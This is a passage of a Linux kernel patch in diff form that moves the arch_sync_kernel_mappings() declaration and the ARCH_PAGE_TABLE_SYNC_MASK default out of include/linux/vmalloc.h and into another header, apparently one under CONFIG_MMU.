+void arch_sync_kernel_mappings(unsigned long start, unsigned long end);
+
#endif /* CONFIG_MMU */
/*
diff --git a/include/linux/vmalloc.h b/include/linux/vmalloc.h
index fdc9aeb74a44..2759dac6be44 100644
--- a/include/linux/vmalloc.h
+++ b/include/linux/vmalloc.h
@@ -219,22 +219,6 @@ extern int remap_vmalloc_range(struct vm_area_struct *vma, void *addr,
int vmap_pages_range(unsigned long addr, unsigned long end, pgprot_t prot,
struct page **pages, unsigned int page_shift);
-/*
- * Architectures can set this mask to a combination of PGTBL_P?D_MODIFIED values
- * and let generic vmalloc and ioremap code know when arch_sync_kernel_mappings()
- * needs to be called.
- */
-#ifndef ARCH_PAGE_TABLE_SYNC_MASK
-#define ARCH_PAGE_TABLE_SYNC_MASK 0
-#endif
-
-/*
- * There is no default implementation for arch_sync_kernel_mappings(). It is
- * relied upon the compiler to optimize calls out if ARCH_PAGE_TABLE_SYNC_MASK
- * is 0.
- */
-void arch_sync_kernel_mappings(unsigned long start, unsigned long end);
-
/*
* Lowlevel-APIs (not for driver use!)
*/
--
2.43.0